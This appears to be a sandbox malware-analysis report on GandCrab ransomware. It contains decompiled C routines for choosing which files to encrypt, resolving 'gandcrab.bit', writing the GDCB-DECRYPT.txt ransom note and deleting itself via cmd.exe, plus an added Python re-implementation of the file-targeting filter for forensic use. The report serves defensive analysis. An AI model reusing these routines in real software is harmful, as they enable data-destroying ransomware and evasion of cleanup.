                                        				void* _t10;
                                        				intOrPtr* _t21;
                                        				void* _t45;
                                        				void* _t46;
                                        
                                        				_t46 = __ecx;
                                        				_t45 = VirtualAlloc(0, 0x201, 0x3000, 0x40); /* 0x201 bytes for SHGetSpecialFolderPathW, which may write MAX_PATH WCHARs (520 bytes); safe only because a whole page is committed */
                                        				if(E0F9D8090(_t46, L"\\ProgramData\\") != 0 || E0F9D8090(_t46, L"\\Program Files\\") != 0 || E0F9D8090(_t46, L"\\Tor Browser\\") != 0 || E0F9D8090(_t46, L"Ransomware") != 0 || E0F9D8090(_t46, L"\\All Users\\") != 0 || E0F9D8090(_t46, L"\\Local Settings\\") != 0) {
                                        					L16:
                                        					VirtualFree(_t45, 0, 0x8000);
                                        					return 0;
                                        				} else {
                                        					_t10 = E0F9D8090(_t46, L":\\Windows\\");
                                        					if(_t10 != 0) {
                                        						goto L16;
                                        					} else {
                                        						_t21 = __imp__SHGetSpecialFolderPathW;
                                        						_push(_t10);
                                        						_push(0x2a); /* CSIDL_PROGRAM_FILESX86 */
                                        						_push(_t45);
                                        						_push(_t10);
                                        						if( *_t21() == 0 || E0F9D8090(_t46, _t45) == 0) {
                                        							_push(0);
                                        							_push(0x2b); /* CSIDL_PROGRAM_FILES_COMMON */
                                        							_push(_t45);
                                        							_push(0);
                                        							if( *_t21() == 0 || E0F9D8090(_t46, _t45) == 0) {
                                        								_push(0);
                                        								_push(0x24); /* CSIDL_WINDOWS */
                                        								_push(_t45);
                                        								_push(0);
                                        								if( *_t21() == 0 || E0F9D8090(_t46, _t45) == 0) {
                                        									_push(0);
                                        									_push(0x1c); /* CSIDL_LOCAL_APPDATA */
                                        									_push(_t45);
                                        									_push(0);
                                        									if( *_t21() == 0 || E0F9D8090(_t46, _t45) == 0) {
                                        										VirtualFree(_t45, 0, 0x8000);
                                        										return 1;
                                        									} else {
                                        										goto L16;
                                        									}
                                        								} else {
                                        									goto L16;
                                        								}
                                        							} else {
                                        								goto L16;
                                        							}
                                        						} else {
                                        							goto L16;
                                        						}
                                        					}
                                        				}
                                        			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000201,00003000,00000040,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6653
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002A,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D66F2
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000002B,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D670C
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,00000024,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6726
                                        • SHGetSpecialFolderPathW.SHELL32(00000000,00000000,0000001C,00000000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6740
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6760
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,0F9D6CA6,00000000,?,?), ref: 0F9D6775
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FolderPathSpecial$Virtual$Free$Alloc
                                        • String ID: :\Windows\$Ransomware$\All Users\$\Local Settings\$\Program Files\$\ProgramData\$\Tor Browser\
                                        • API String ID: 1363212851-2358141795
                                        • Opcode ID: 37cfdcb4eecc45faf3ac1ae2cc41a8a0902f3e6f99e1812a5e7fed6b1e8a32d4
                                        • Instruction ID: 63fb26e1ad6028de2f43eb3ec37fe6f1676d4bfc3e1055f10c589ee968b4916a
                                        • Opcode Fuzzy Hash: 37cfdcb4eecc45faf3ac1ae2cc41a8a0902f3e6f99e1812a5e7fed6b1e8a32d4
                                        • Instruction Fuzzy Hash: 5A312C2834071522F9A035B68E65B6F688E8BC1F95F74C415BB02DE2C3EF9DD9014699
                                        Uniqueness

                                        Uniqueness Score: -1.00%
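Added example (not part of the report and not the sample's code): the path filter of E0F9D6640 re-implemented in Python, so the set of paths the sample would have skipped can be reproduced on an analysis box and checked against a file-system timeline. Two assumptions are made explicit in the code: E0F9D8090, which the page does not show, is taken to be a case-insensitive substring test (the literal fragments and the CSIDL folder paths only make sense as substrings of the candidate path held in ecx), and the special-folder paths are constructed values for a user named alice, not data from the report. The order of checks is the one the decompilation shows: the six literals, then ":\Windows\", then the four CSIDLs; a failing SHGetSpecialFolderPathW call simply moves on to the next CSIDL.

```python
from typing import Mapping

# Literal fragments tested first, in the order the decompilation shows them.
EXCLUDED_SUBSTRINGS = (
    "\\ProgramData\\",
    "\\Program Files\\",
    "\\Tor Browser\\",
    "Ransomware",
    "\\All Users\\",
    "\\Local Settings\\",
    ":\\Windows\\",
)

# SHGetSpecialFolderPathW CSIDL values, in the order the sample queries them.
CSIDL_PROGRAM_FILESX86 = 0x2A
CSIDL_PROGRAM_FILES_COMMON = 0x2B
CSIDL_WINDOWS = 0x24
CSIDL_LOCAL_APPDATA = 0x1C
EXCLUDED_CSIDLS = (CSIDL_PROGRAM_FILESX86, CSIDL_PROGRAM_FILES_COMMON,
                   CSIDL_WINDOWS, CSIDL_LOCAL_APPDATA)

# Constructed stand-ins for what SHGetSpecialFolderPathW would return for user
# 'alice' on a typical install. Assumptions, not values from the report.
EXAMPLE_SPECIAL_FOLDERS = {
    CSIDL_PROGRAM_FILESX86: "C:\\Program Files (x86)",
    CSIDL_PROGRAM_FILES_COMMON: "C:\\Program Files\\Common Files",
    CSIDL_WINDOWS: "C:\\Windows",
    CSIDL_LOCAL_APPDATA: "C:\\Users\\alice\\AppData\\Local",
}


def contains_ci(haystack: str, needle: str) -> bool:
    """ASSUMPTION: E0F9D8090 behaves as a case-insensitive substring test."""
    return needle.casefold() in haystack.casefold()


def should_encrypt(path: str, special_folders: Mapping[int, str]) -> bool:
    """True mirrors the sample's return value 1 (path is processed),
    False mirrors 0 (path is skipped)."""
    for fragment in EXCLUDED_SUBSTRINGS:
        if contains_ci(path, fragment):
            return False
    for csidl in EXCLUDED_CSIDLS:
        folder = special_folders.get(csidl)
        # A missing entry models SHGetSpecialFolderPathW returning 0: the
        # sample then just tries the next CSIDL.
        if folder and contains_ci(path, folder):
            return False
    return True


if __name__ == "__main__":
    for candidate in ("C:\\Users\\alice\\Documents\\q3.xlsx",
                      "C:\\Program Files (x86)\\App\\app.exe",
                      "C:\\Users\\alice\\AppData\\Roaming\\App\\settings.ini"):
        print(should_encrypt(candidate, EXAMPLE_SPECIAL_FOLDERS), candidate)
```

The two layers are not redundant: "C:\Program Files (x86)\..." slips past the literal "\Program Files\" fragment and is caught only by the CSIDL_PROGRAM_FILESX86 query, while "Ransomware" anywhere in a path (a notes folder on a share, for instance) is enough on its own to exclude the file. Roaming AppData is not on either list.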

                                        C-Code - Quality: 86%
                                        			/* Builds three candidate strings on the stack: one is "gandcrab.bit",
                                        			   stored as the dword immediates below; the other two are copied from
                                        			   .rdata (0xf9e04c0, 0xf9e04d0) through xmm0. The loop then hands the
                                        			   current candidate to E0F9D4E90, which fills a fresh buffer, and retries
                                        			   (with a 1 s Sleep from the second pass on) as long as the result equals
                                        			   "fabian wosar <3". The first differing result is widened with
                                        			   wsprintfW("%S") into the 0x100-byte buffer and returned. */
                                        			E0F9D5060() {
                                        				WCHAR* _v8;
                                        				intOrPtr _v12;
                                        				char* _v16;
                                        				char* _v20;
                                        				char* _v24;
                                        				char _v28;
                                        				intOrPtr _v32;
                                        				intOrPtr _v36;
                                        				char _v40;
                                        				char _v44;
                                        				char _v60;
                                        				short _v64;
                                        				char _v80;
                                        				WCHAR* _t26;
                                        				intOrPtr _t27;
                                        				long _t32;
                                        				WCHAR* _t37;
                                        				void* _t39;
                                        				signed int _t40;
                                        				signed int _t41;
                                        				signed int _t45;
                                        				void* _t48;
                                        				WCHAR* _t49;
                                        				void* _t52;
                                        				void* _t53;
                                        
                                        				asm("movdqa xmm0, [0xf9e04c0]");
                                        				_v24 =  &_v80;
                                        				asm("movdqu [ebp-0x4c], xmm0");
                                        				_v20 =  &_v60;
                                        				asm("movdqa xmm0, [0xf9e04d0]");
                                        				_v64 = 0x6e; /* 'n' followed by a NUL, written over the tail of the first xmm block */
                                        				asm("movdqu [ebp-0x38], xmm0");
                                        				_v44 = 0;
                                        				_v40 = 0x646e6167; /* "gand" */
                                        				_v36 = 0x62617263; /* "crab" */
                                        				_v32 = 0x7469622e; /* ".bit" */
                                        				_v28 = 0;
                                        				_v16 =  &_v40;
                                        				_t26 = VirtualAlloc(0, 0x100, 0x3000, 4);
                                        				_t37 = _t26;
                                        				_v8 = _t37;
                                        				if(_t37 != 0) {
                                        					_t40 = 0;
                                        					_t48 = 1;
                                        					_t45 = 0;
                                        					while(1) {
                                        						_t27 =  *((intOrPtr*)(_t52 + _t45 * 4 - 0x14));
                                        						_t45 = _t45 + 1;
                                        						_v12 = _t27;
                                        						if(_t45 == 3) {
                                        							asm("sbb esi, esi");
                                        							_t48 =  ~(_t48 - 1) + 2;
                                        							_t45 = 0;
                                        						}
                                        						if(_t40 == 0xffffffff) {
                                        							Sleep(0x3e8); /* 1000 ms between retries */
                                        						}
                                        						_t39 = VirtualAlloc(0, 2 + lstrlenW(_t37) * 2, 0x3000, 4);
                                        						_t41 = _t39;
                                        						E0F9D4E90(_t41, _v12, _t48);
                                        						_t53 = _t53 + 4;
                                        						_t32 = lstrcmpiA(_t39, "fabian wosar <3");
                                        						if(_t32 != 0) { /* leave the loop on the first result that differs from the string */
                                        							break;
                                        						}
                                        						VirtualFree(_t39, _t32, 0x8000);
                                        						_t37 = _v8;
                                        						_t40 = _t41 | 0xffffffff;
                                        					}
                                        					_t49 = _v8;
                                        					wsprintfW(_t49, L"%S", _t39);
                                        					VirtualFree(_t39, 0, 0x8000);
                                        					_t26 = _t49;
                                        				}
                                        				return _t26;
                                        			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000100,00003000,00000004,74CB6980,00000000,00000000), ref: 0F9D50C6
                                        • Sleep.KERNEL32(000003E8), ref: 0F9D5103
                                        • lstrlenW.KERNEL32(00000000,00003000,00000004), ref: 0F9D5111
                                        • VirtualAlloc.KERNEL32(00000000,00000000), ref: 0F9D5121
                                        • lstrcmpiA.KERNEL32(00000000,fabian wosar <3), ref: 0F9D513D
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D514E
                                        • wsprintfW.USER32 ref: 0F9D5166
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0F9D5177
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Virtual$AllocFree$Sleeplstrcmpilstrlenwsprintf
                                        • String ID: .bit$crab$fabian wosar <3$gand$n
                                        • API String ID: 2709691373-4182624408
                                        • Opcode ID: 90803cdf302baef34d2629e262a4b3c90835efaf7b2a7602b99ca774b972a45e
                                        • Instruction ID: 9c36e470d450ed4055a241a1299acd72cf4b3d47c7fc362c8ce505c983dfb3d8
                                        • Opcode Fuzzy Hash: 90803cdf302baef34d2629e262a4b3c90835efaf7b2a7602b99ca774b972a45e
                                        • Instruction Fuzzy Hash: 9D310671E04319A7EB11CFA8DC85BEE7BBCAB44314F204115F606B72C2E7B45A508B94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 93%
                                        			E0F9D7140(intOrPtr* __ecx) {
                                        				int _t42;
                                        				int _t48;
                                        				int _t51;
                                        				int _t54;
                                        				int _t57;
                                        				int _t60;
                                        				int _t63;
                                        				int _t66;
                                        				int _t70;
                                        				int _t72;
                                        				void* _t75;
                                        				intOrPtr* _t86;
                                        				int _t88;
                                        				int _t89;
                                        				int _t90;
                                        				int _t91;
                                        				int _t92;
                                        				int _t93;
                                        				int _t94;
                                        				void* _t95;
                                        
                                        				_t40 = lstrlenW;
                                        				_t86 = __ecx;
                                        				_t75 = 0;
                                        				if( *__ecx != 0) {
                                        					_t72 = lstrlenW( *(__ecx + 8));
                                        					_t3 = lstrlenW( *(_t86 + 4)) + 4; // 0x4
                                        					_t40 = lstrlenW;
                                        					_t75 = _t3 + _t72;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0xc)) != 0) {
                                        					_t95 =  *_t40( *((intOrPtr*)(_t86 + 0x14)));
                                        					_t70 = lstrlenW( *(_t86 + 0x10));
                                        					_t7 = _t95 + 4; // 0x4
                                        					_t75 = _t7 + _t70 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x18)) != 0) {
                                        					_t94 = lstrlenW( *(_t86 + 0x20));
                                        					_t66 = lstrlenW( *(_t86 + 0x1c));
                                        					_t11 = _t94 + 4; // 0x4
                                        					_t75 = _t11 + _t66 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x24)) != 0) {
                                        					_t93 = lstrlenW( *(_t86 + 0x2c));
                                        					_t63 = lstrlenW( *(_t86 + 0x28));
                                        					_t15 = _t93 + 4; // 0x4
                                        					_t75 = _t15 + _t63 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x30)) != 0) {
                                        					_t92 = lstrlenW( *(_t86 + 0x38));
                                        					_t60 = lstrlenW( *(_t86 + 0x34));
                                        					_t19 = _t92 + 4; // 0x4
                                        					_t75 = _t19 + _t60 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x3c)) != 0) {
                                        					_t91 = lstrlenW( *(_t86 + 0x44));
                                        					_t57 = lstrlenW( *(_t86 + 0x40));
                                        					_t23 = _t91 + 4; // 0x4
                                        					_t75 = _t23 + _t57 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x48)) != 0) {
                                        					_t90 = lstrlenW( *(_t86 + 0x50));
                                        					_t54 = lstrlenW( *(_t86 + 0x4c));
                                        					_t27 = _t90 + 4; // 0x4
                                        					_t75 = _t27 + _t54 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x54)) != 0) {
                                        					_t89 = lstrlenW( *(_t86 + 0x5c));
                                        					_t51 = lstrlenW( *(_t86 + 0x58));
                                        					_t31 = _t89 + 4; // 0x4
                                        					_t75 = _t31 + _t51 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x60)) != 0) {
                                        					_t75 = _t75 + 0x14;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x74)) != 0) {
                                        					_t88 = lstrlenW( *(_t86 + 0x7c));
                                        					_t48 = lstrlenW( *(_t86 + 0x78));
                                        					_t36 = _t88 + 4; // 0x4
                                        					_t75 = _t36 + _t48 + _t75;
                                        				}
                                        				if( *((intOrPtr*)(_t86 + 0x80)) == 0) {
                                        					return _t75;
                                        				} else {
                                        					_t42 = lstrlenW( *(_t86 + 0x88));
                                        					return lstrlenW( *(_t86 + 0x84)) + 4 + _t75 + _t42;
                                        				}
                                        			}

                                        APIs
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7192
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D719D
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71B3
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71BE
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71D4
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71DF
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D71F5
                                        • lstrlenW.KERNEL32(0F9D4966,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7200
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7216
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7221
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7237
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7242
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7261
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D726C
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7288
                                        • lstrlenW.KERNEL32(?,?,?,?,0F9D4649,00000000,?,00000000,00000000,?,00000000), ref: 0F9D7296
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: lstrlen
                                        • String ID:
                                        • API String ID: 1659193697-0
                                        • Opcode ID: 6a88eac016091fd40f4fac5fda2f6562c290ef44477970f82424d7ea23117100
                                        • Instruction ID: 9d68a9b8f781679658be0a54c2da7e352ce35ebdcfacee7124517a2674326a03
                                        • Opcode Fuzzy Hash: 6a88eac016091fd40f4fac5fda2f6562c290ef44477970f82424d7ea23117100
                                        • Instruction Fuzzy Hash: 04413032101652EFD7125FB8DE8C794BBA1FF04326F188534E51682A62D775B8B8DF81
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0F9D53A0(WCHAR* __ecx) {
                                        				CHAR* _v8;
                                        				void* _v12;
                                        				void* _v16;
                                        				void* _v20;
                                        				void* _v24;
                                        				void* _t22;
                                        				void* _t24;
                                        				signed int _t26;
                                        				int _t30;
                                        				char _t32;
                                        				void* _t33;
                                        				signed char _t34;
                                        				CHAR* _t36;
                                        				WCHAR* _t37;
                                        				WCHAR* _t38;
                                        				void* _t39;
                                        				CHAR* _t40;
                                        
                                        				_t37 = __ecx;
                                        				_t39 = VirtualAlloc(0, 0x404, 0x3000, 0x40);
                                        				_v20 = _t39;
                                        				GetModuleFileNameW(0, _t39, 0x200);
                                        				_t33 = CreateFileW(_t39, 0x80000000, 1, 0, 3, 0x80, 0);
                                        				_v16 = _t33;
                                        				if(_t33 != 0xffffffff) {
                                        					_t22 = CreateFileMappingW(_t33, 0, 8, 0, 0, 0);
                                        					_v24 = _t22;
                                        					if(_t22 != 0) {
                                        						_t24 = MapViewOfFile(_t22, 1, 0, 0, 0);
                                        						_v12 = _t24;
                                        						if(_t24 != 0) {
                                        							_t5 = _t24 + 0x4e; // 0x4e
                                        							_t40 = _t5;
                                        							_v8 = _t40;
                                        							_t26 = lstrlenW(_t37);
                                        							_t34 = 0;
                                        							_t38 =  &(_t37[_t26]);
                                        							if(lstrlenA(_t40) + _t27 != 0) {
                                        								_t36 = _t40;
                                        								do {
                                        									if((_t34 & 0x00000001) != 0) {
                                        										 *((char*)(_t38 + _t34)) = 0;
                                        									} else {
                                        										_t32 =  *_t40;
                                        										_t40 =  &(_t40[1]);
                                        										 *((char*)(_t38 + _t34)) = _t32;
                                        									}
                                        									_t34 = _t34 + 1;
                                        									_t30 = lstrlenA(_t36);
                                        									_t36 = _v8;
                                        								} while (_t34 < _t30 + _t30);
                                        							}
                                        							UnmapViewOfFile(_v12);
                                        							_t33 = _v16;
                                        							_t39 = _v20;
                                        						}
                                        						CloseHandle(_v24);
                                        					}
                                        					CloseHandle(_t33);
                                        				}
                                        				return VirtualFree(_t39, 0, 0x8000);
                                        			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000404,00003000,00000040,00000000,74CF81D0,00000000,?,?,?,?,0F9D55B2), ref: 0F9D53B9
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200,?,?,?,?,0F9D55B2), ref: 0F9D53CC
                                        • CreateFileW.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,0F9D55B2), ref: 0F9D53E5
                                        • CreateFileMappingW.KERNEL32(00000000,00000000,00000008,00000000,00000000,00000000,?,?,?,?,0F9D55B2), ref: 0F9D5404
                                        • MapViewOfFile.KERNEL32(00000000,00000001,00000000,00000000,00000000,?,?,?,?,0F9D55B2), ref: 0F9D541A
                                        • lstrlenW.KERNEL32(?,?,?,?,?,0F9D55B2), ref: 0F9D542E
                                        • lstrlenA.KERNEL32(0000004E,?,?,?,?,0F9D55B2), ref: 0F9D543A
                                        • lstrlenA.KERNEL32(0000004E,?,?,?,?,0F9D55B2), ref: 0F9D5459
                                        • UnmapViewOfFile.KERNEL32(?,?,?,?,?,0F9D55B2), ref: 0F9D546B
                                        • CloseHandle.KERNEL32(?,?,?,?,?,0F9D55B2), ref: 0F9D547A
                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,0F9D55B2), ref: 0F9D5481
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,?,0F9D55B2), ref: 0F9D548F
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: File$lstrlen$CloseCreateHandleViewVirtual$AllocFreeMappingModuleNameUnmap
                                        • String ID:
                                        • API String ID: 869890170-0
                                        • Opcode ID: 91f8594f7e53ff3347cc5327525c73afad142cb364c1f65c698b8143711735c8
                                        • Instruction ID: 0a4ec33140be44d973fc6aebe2ad37e932ed4cd16b21a66ecc3e5b17ab2045a9
                                        • Opcode Fuzzy Hash: 91f8594f7e53ff3347cc5327525c73afad142cb364c1f65c698b8143711735c8
                                        • Instruction Fuzzy Hash: 2B31F670645315BBF7304FA49C4AF9D7B6CAF05B12F348014F701BA1C2CAB8A5608B69
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0F9D6BE0(void* __ecx) {
                                        				long _v8;
                                        				WCHAR* _t7;
                                        				signed int _t16;
                                        				void* _t21;
                                        				void* _t22;
                                        				void* _t25;
                                        
                                        				_t25 = VirtualAlloc(0, 0x402, 0x3000, 0x40);
                                        				wsprintfW(_t25, L"%s\\GDCB-DECRYPT.txt", _t21);
                                        				_t22 = CreateFileW(_t25, 0x40000000, 0, 0, 1, 0x80, 0);
                                        				if(_t22 != 0xffffffff) {
                                        					_t7 =  *0xf9e2a64; // 0x1f2000
                                        					if(_t7 != 0) {
                                        						WriteFile(_t22,  *0xf9e2a64, lstrlenW(_t7) + _t11,  &_v8, 0);
                                        					}
                                        					CloseHandle(_t22);
                                        					_t16 = 1;
                                        				} else {
                                        					_t16 = 0 | GetLastError() == 0x000000b7;
                                        				}
                                        				VirtualFree(_t25, 0, 0x8000);
                                        				return _t16;
                                        			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000402,00003000,00000040,00000000,?,?,?,?,0F9D6CC2,00000000,?,?), ref: 0F9D6BF5
                                        • wsprintfW.USER32 ref: 0F9D6C03
                                        • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,?), ref: 0F9D6C1F
                                        • GetLastError.KERNEL32(?,?), ref: 0F9D6C2C
                                        • lstrlenW.KERNEL32(001F2000,?,00000000,?,?), ref: 0F9D6C4E
                                        • WriteFile.KERNEL32(00000000,00000000,?,?), ref: 0F9D6C5E
                                        • CloseHandle.KERNEL32(00000000,?,?), ref: 0F9D6C65
                                        • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?), ref: 0F9D6C78
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: FileVirtual$AllocCloseCreateErrorFreeHandleLastWritelstrlenwsprintf
                                        • String ID: %s\GDCB-DECRYPT.txt
                                        • API String ID: 2985722263-4054134092
                                        • Opcode ID: 61ecc08a0d74ff2eb05ea93f08ce3620796b9f9efbc6721815f43839a10bb89a
                                        • Instruction ID: 528289e7129729d578782d09b17d4617148ebba06c88b738be64b4aae6f39272
                                        • Opcode Fuzzy Hash: 61ecc08a0d74ff2eb05ea93f08ce3620796b9f9efbc6721815f43839a10bb89a
                                        • Instruction Fuzzy Hash: DB01B5753493107BF2301B74ED4BF6A3A6CDB46B66F304114FB05E91C2DBA869708669
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 100%
                                        			E0F9D5190() {
                                        				WCHAR* _t6;
                                        				short* _t8;
                                        
                                        				_t6 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                        				_t8 = VirtualAlloc(0, 0x400, 0x3000, 4);
                                        				if(_t6 != 0) {
                                        					GetModuleFileNameW(0, _t6, 0x200);
                                        					if(_t8 != 0) {
                                        						wsprintfW(_t8, L"/c timeout -c 5 & del \"%s\" /f /q", _t6);
                                        						ShellExecuteW(0, L"open", L"cmd.exe", _t8, 0, 0);
                                        					}
                                        				}
                                        				ExitProcess(0);
                                        			}

                                        APIs
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004,00000000,00000000,0F9D5392,00000000), ref: 0F9D51A6
                                        • VirtualAlloc.KERNEL32(00000000,00000400,00003000,00000004), ref: 0F9D51B8
                                        • GetModuleFileNameW.KERNEL32(00000000,00000000,00000200), ref: 0F9D51C8
                                        • wsprintfW.USER32 ref: 0F9D51D9
                                        • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 0F9D51F3
                                        • ExitProcess.KERNEL32 ref: 0F9D51FB
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000014.00000002.325478806.000000000F9D1000.00000020.00000001.01000000.00000005.sdmp, Offset: 0F9D0000, based on PE: true
                                        • Associated: 00000014.00000002.325470957.000000000F9D0000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325486891.000000000F9DA000.00000002.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325494839.000000000F9E2000.00000008.00000001.01000000.00000005.sdmp
                                        • Associated: 00000014.00000002.325499771.000000000F9E4000.00000002.00000001.01000000.00000005.sdmp
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_20_2_f9d0000_isqmkp.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AllocVirtual$ExecuteExitFileModuleNameProcessShellwsprintf
                                        • String ID: /c timeout -c 5 & del "%s" /f /q$cmd.exe$open
                                        • API String ID: 4033023619-516011104
                                        • Opcode ID: 88e0d11951383276035ca72d3f631ed8fe3de7c76dbd2aee08c05eca70f6a8ca
